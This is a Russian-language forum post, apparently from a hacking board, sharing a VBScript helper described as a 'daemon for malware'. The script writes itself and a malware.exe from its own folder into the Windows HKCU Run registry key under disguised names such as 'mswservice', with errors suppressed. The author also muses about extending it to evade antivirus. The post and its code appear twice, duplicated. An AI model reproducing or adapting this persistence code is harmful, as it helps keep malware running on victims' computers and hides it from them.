- Автор темы
- #1
Небольшой демон для малваря на вбс. Добавляет в автозапуск малварь в своём каталоге. Думаю не стоить объяснять, что такое решение лучше и долговечнее синглового файла.
Код
Код:
Set e = CreateObject("WScript.Shell")
Set c = e.SpecialFolders
Set FSO = CreateObject("Scripting.FileSystemObject")
Set file = FSO.GetFile(Wscript.ScriptFullName)
path = FSO.GetParentFolderName(file)
pathtomalware = path&"\malware.exe"
On Error Resume Next
e.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mswservice", WScript.ScriptFullName
e.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\msservice", pathtomalware
Если заморочиться, можно конечно доработать его до создания батника на ходу, чтобы перетягивал на себя особо хитрозадые китайские антивирусы. Но я не в Китае и большого профита от этого не получу
Код
Код:
Set e = CreateObject("WScript.Shell")
Set c = e.SpecialFolders
Set FSO = CreateObject("Scripting.FileSystemObject")
Set file = FSO.GetFile(Wscript.ScriptFullName)
path = FSO.GetParentFolderName(file)
pathtomalware = path&"\malware.exe"
On Error Resume Next
e.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mswservice", WScript.ScriptFullName
e.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\msservice", pathtomalware
Если заморочиться, можно конечно доработать его до создания батника на ходу, чтобы перетягивал на себя особо хитрозадые китайские антивирусы. Но я не в Китае и большого профита от этого не получу